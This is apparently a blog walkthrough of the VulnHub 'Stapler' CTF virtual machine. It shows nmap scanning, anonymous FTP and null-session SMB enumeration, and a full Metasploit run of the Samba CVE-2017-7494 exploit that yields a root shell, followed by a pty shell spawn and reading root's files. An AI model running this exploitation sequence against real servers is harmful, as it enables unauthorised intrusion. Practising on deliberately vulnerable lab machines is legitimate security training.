Table of contents


Today I’m ready to publish my walkthrough against the vm hosted on vulnhub called Stapler by g0tmi1k.

Starting with this, we can find a few notes on vulnhub’s page’s description from g0tmi1k. It was made for BsidesLondon 2016 and we can also find the slides!

Intelligence Gathering

We need to find the vm’s ip, so I used netdiscover: Net Discover

Then, as always, I used nmap to discovery open ports:

root@kali:~/Immagini# nmap -sV -A -PN

Starting Nmap 7.50 ( ) at 2017-06-25 22:49 CEST
Nmap scan report for
Host is up (0.00035s latency).
Not shown: 992 filtered ports
20/tcp   closed ftp-data
21/tcp   open   ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: Can't parse PASV response: "Permission denied."
22/tcp   open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|   256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_  256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (EdDSA)
53/tcp   open   domain      dnsmasq 2.75
| dns-nsid: 
|_  bind.version: dnsmasq-2.75
80/tcp   open   http        PHP cli server 5.5 or later
|_http-title: 404 Not Found
139/tcp  open   netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp  open   doom?
| fingerprint-strings: 
|   NULL: 
|     message2.jpgUT 
|     QWux
|     "DL[E
|     #;3[
|     \xf6
|     u([r
|     qYQq
|     Y_?n2
|     3&M~{
|     9-a)T
|     L}AJ
|_    .npy.9
3306/tcp open   mysql       MySQL 5.7.12-0ubuntu1
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.12-0ubuntu1
|   Thread ID: 7
|   Capabilities flags: 63487
|   Some Capabilities: Support41Auth, Speaks41ProtocolOld, SupportsTransactions, SupportsCompression, ODBCClient, InteractiveClient, IgnoreSigpipes, ConnectWithDatabase, DontAllowDatabaseTableColumn, FoundRows, LongColumnFlag, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, LongPassword, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: WU98g\x123\x13lm"19%\x07`;wv\x0C
|_  Auth Plugin Name: 88
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :
MAC Address: 08:00:27:B0:D2:D6 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h00m33s, deviation: 0s, median: 2h00m33s
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: red
|   NetBIOS computer name: RED\x00
|   Domain name: \x00
|   FQDN: red
|_  System time: 2017-06-25T23:51:02+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

1   0.35 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 86.38 seconds

The scanning result reveals some open ports! The http port returned a 404 Not Found error: Website Port 80

so I began with the ftp port that running vsftpd 2.0.8 or later.

Vulnerability Analysis

I tried to connect to ftp port with anonymous account

root@kali:~/Immagini# ftp
Connected to
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
Name ( anonymous
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/" is the current directory
ftp> ls -l
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             107 Jun 03  2016 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 0.02 secs (6.5884 kB/s)
root@kali:~# cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.

The note file reveals some potential usernames but nothing more. So I tried the ssh username enumeration exploiting the CVE-2016-6210, found in exploit-db, without success! :sweat:

Nmap scan also revealed port 139 which was an open netbios-ssn, so I tried to connect with smbclient. When asked the root password, I just typed in ‘root’.

root@kali:~# smbclient -L
WARNING: The "syslog" option is deprecated
Enter root's password: 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	kathy           Disk      Fred, What are we doing here?
	tmp             Disk      All temporary files should be stored here
	IPC$            IPC       IPC Service (red server (Samba, Ubuntu))
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

	Server               Comment
	---------            -------
	RED                  red server (Samba, Ubuntu)

	Workgroup            Master
	---------            -------
	WORKGROUP            RED

As we can see there are two active shares, kathy and tmp. In kathy we read a little hit comment.. Fred, What are we doing here? ..this makes us think that Fred had access to kathy’s share! :smirk:

root@kali:~# smbclient //fred/kathy -I -N
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> pwd
Current directory is \\fred\kathy\
smb: \> ls
  .                                   D        0  Fri Jun  3 18:52:52 2016
  ..                                  D        0  Mon Jun  6 23:39:56 2016
  kathy_stuff                         D        0  Sun Jun  5 17:02:27 2016
  backup                              D        0  Sun Jun  5 17:04:14 2016

		19478204 blocks of size 1024. 16397076 blocks available
smb: \> cd kathy_stuff\
smb: \kathy_stuff\> ls
  .                                   D        0  Sun Jun  5 17:02:27 2016
  ..                                  D        0  Fri Jun  3 18:52:52 2016
  todo-list.txt                       N       64  Sun Jun  5 17:02:27 2016

		19478204 blocks of size 1024. 16397076 blocks available
smb: \kathy_stuff\> get todo-list.txt 
getting file \kathy_stuff\todo-list.txt of size 64 as todo-list.txt (1,9 KiloBytes/sec) (average 1,9 KiloBytes/sec)

Good! Let’s go enumerating the files and folder on the share and we can see two folder, kathy_stuff and backup. In kathy_stuff folder I we find todo-list.txt file, and in backup folder we find a vsftpd configuration file and an archive named wordpress-4. Let’s get all file!

smb: \kathy_stuff\> cd ../backup\
smb: \backup\> ls
  .                                   D        0  Sun Jun  5 17:04:14 2016
  ..                                  D        0  Fri Jun  3 18:52:52 2016
  vsftpd.conf                         N     5961  Sun Jun  5 17:03:45 2016
  wordpress-4.tar.gz                  N  6321767  Mon Apr 27 19:14:46 2015

		19478204 blocks of size 1024. 16397076 blocks available
smb: \backup\> get vsftpd.conf 
getting file \backup\vsftpd.conf of size 5961 as vsftpd.conf (76,6 KiloBytes/sec) (average 54,0 KiloBytes/sec)
smb: \backup\> get wordpress-4.tar.gz 
getting file \backup\wordpress-4.tar.gz of size 6321767 as wordpress-4.tar.gz (17538,6 KiloBytes/sec) (average 13404,5 KiloBytes/sec)

Then I tried the tmp share and did the same:

root@kali:~# smbclient //fred/tmp -I -N
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> pwd
Current directory is \\fred\tmp\
smb: \> ls
  .                                   D        0  Mon Jun 26 01:26:41 2017
  ..                                  D        0  Mon Jun  6 23:39:56 2016
  ls                                  N      274  Sun Jun  5 17:32:58 2016

		19478204 blocks of size 1024. 16397076 blocks available
smb: \> get ls
getting file \ls of size 274 as ls (1,0 KiloBytes/sec) (average 1,0 KiloBytes/sec)

Fine! After that I opened the todo-list that reveals another name, but the ls seemed to listing of a time synchronization daemon.. nothing useful for now..

root@kali:~# cat todo-list.txt 
I'm making sure to backup anything important for Initech, Kathy
root@kali:~# cat ls
total 12.0K
drwxrwxrwt  2 root root 4.0K Jun  5 16:32 .
drwxr-xr-x 16 root root 4.0K Jun  3 22:06 ..
-rw-r--r--  1 root root    0 Jun  5 16:32 ls
drwx------  3 root root 4.0K Jun  5 15:32 systemd-private-df2bff9b90164a2eadc490c0b8f76087-systemd-timesyncd.service-vFKoxJ


Then I used searchsploit to find exploit for Samba 4.3.9:

root@kali:~# searchsploit samba
---------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                |  Path
                                                                                              | (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------------- ----------------------------------
Samba 3.5.0 - Remote Code Execution                                                           | exploits/linux/remote/
Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit)  | exploits/linux/remote/42084.rb

This Remote Code Execution is named EternalRed. Much like the EternalBlue exploit that was released in April 2017 after being stolen from the NSA, Samba was discovered to have a remote code execution vulnerability as well. Dubbed ‘EternalRed’ by industry-types, this vulnerability dates as far as 2010. So even if you chose the red pill thinking Linux was a safer alternative, for 7 years you were just as vulnerable as those using Windows. Samba version 3.5.0, the version that introduced the flaw, was released in March 2010. The bug causing this vulnerability is in the is_known_pipename() function. After these info I tried the exploit but I didn’t be able to do work with it. So I opened metasploit and I launched the exploit:

msf > search CVE-2017-7494

Matching Modules

   Name                                   Disclosure Date  Rank       Description
   ----                                   ---------------  ----       -----------
   exploit/linux/samba/is_known_pipename  2017-03-24       excellent  Samba is_known_pipename() Arbitrary Module Load

msf > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > show options 

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOST                            yes       The target address
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER                       no        The directory to use within the writeable SMB share
   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory

Exploit target:

   Id  Name
   --  ----
   0   Automatic (Interact)

msf exploit(is_known_pipename) > set RHOST
msf exploit(is_known_pipename) > set RPORT 139
RPORT => 139
msf exploit(is_known_pipename) > set payload cmd/unix/interact 
payload => cmd/unix/interact
msf exploit(is_known_pipename) > exploit

[*] - Using location \\\tmp\ for the path
[*] - Retrieving the remote path of the share 'tmp'
[*] - Share 'tmp' has server-side path '/var/tmp
[*] - Uploaded payload to \\\tmp\
[*] - Loading the payload from server-side path /var/tmp/ using \\PIPE\/var/tmp/
[-] -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] - Loading the payload from server-side path /var/tmp/ using /var/tmp/
[-] -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] - Uploaded payload to \\\tmp\
[*] - Loading the payload from server-side path /var/tmp/ using \\PIPE\/var/tmp/
[-] -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] - Loading the payload from server-side path /var/tmp/ using /var/tmp/
[+] - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened ( -> at 2017-06-30 19:18:22 +0200

Oh yes! Exploited successfully! We are root :smiling_imp:!! Now for having a complete shell just let us spawn bash shell with python:

python -c "import pty; pty.spawn('/bin/bash')"
root@red:/# uname -a
uname -a
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
root@red:/# whoami
root@red:/# ls -l /root
total 72
-rwxr-xr-x 1 root root  1090 Jun  5  2016
-rw-r--r-- 1 root root   463 Jun  5  2016 flag.txt
-rw-r--r-- 1 root root   345 Jun  5  2016 issue
-rwxr-xr-x 1 root root   103 Jun  5  2016
-rw-r--r-- 1 root root 54405 Jun  5  2016 wordpress.sql
root@red:/# cat /root/issue

                        __..--''         \
                __..--''          __..--''
        __..--''          __..--''       |
        \ o        __..--''____....----""
         |         \

root@red:/# cat /root/

## Bring up all interfaces (*cough* Vbox *cough*)
for iface in $(ip addr | awk -F ':' '/state/ {print $2}'); do
  ifconfig ${iface} up
  dhclient ${iface} &>/dev/null
sleep 2s

## What is eth0?
lanip=$(ip addr | grep inet | grep -v '' | cut -d"/" -f1 | awk '{print $2}' | head -n 1)

# Console login banner
cp -rf /root/issue /etc/issue

## Did we get the IP?
if [ "${lanip}" ]; then
  ## Start MySQL
  /bin/systemctl start mysql.service
  sleep 2s

  ## Update wordpress
  #/usr/bin/mysql -D wordpress --execute="UPDATE wp_options SET option_value=\"https://${lanip}:12380/blogblog\" WHERE option_name = 'home' OR option_name = 'siteurl';"
  sed "s/x\.x\.x\.x/${lanip}/g" /root/wordpress.sql > /root/wordpress_temp.sql
  /usr/bin/mysql -uroot -pplbkac -e "DROP DATABASE IF EXISTS wordpress"
  /usr/bin/mysql -uroot -pplbkac -e "CREATE DATABASE wordpress"
  /usr/bin/mysql -uroot -pplbkac -D wordpress < /root/wordpress_temp.sql

  ## Clean up & feedback
  rm -f /root/wordpress_temp.sql
  echo "Success"
  echo "ERROR GETTING LAN IP" | tee -a /etc/issue

root@red:/# cat /root/
su -c 'cd /home/JKanode; python2 -m SimpleHTTPServer 8888 &>/dev/null' JKanode &>/dev/null


root@red:/# cat /root/flag.txt
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)  


Thanks to g0tmi1k for this CTF. Good Work as always!!